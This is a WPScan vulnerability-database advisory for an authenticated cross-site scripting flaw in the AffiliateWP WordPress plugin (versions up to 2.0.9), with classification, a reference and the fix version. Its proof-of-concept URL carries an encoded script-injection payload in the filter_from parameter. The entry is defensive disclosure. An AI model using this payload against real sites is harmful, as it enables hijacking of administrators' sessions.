WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

AffiliateWP <= 2.0.9 - Authenticated Cross-Site Scripting (XSS)

Description

The AffiliateWP WordPress plugin was affected by an Authenticated Cross-Site Scripting (XSS) security vulnerability.

Proof of Concept

http://vulnerablesite.com//wp-admin/admin.php?page=affiliate-wp-referrals&filter_from=%27%3C%2Fscript%3E%3Cscript%3Ealert%2842%29%3C%2Fscript%3E

Affects Plugins

AffiliateWP
Fixed in version 2.0.9.1

References

URL
https://www.defensecode.com/advisories/DC-2017-05-005_WordPress_AffiliateWP_Plugin_Advisory.pdf

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Submitter

Neven Biruski

Submitter website
http://www.defensecode.com
Submitter twitter
https://www.twitter.com/DefenseCode
Verified

No

WPVDB ID
e3ea30c6-eee6-409c-bd0a-ffd90dc94ac1

Timeline

Publicly Published

2017-05-24 (about 5 years ago)

Added

2017-05-26 (about 5 years ago)

Last Updated

2019-11-01 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin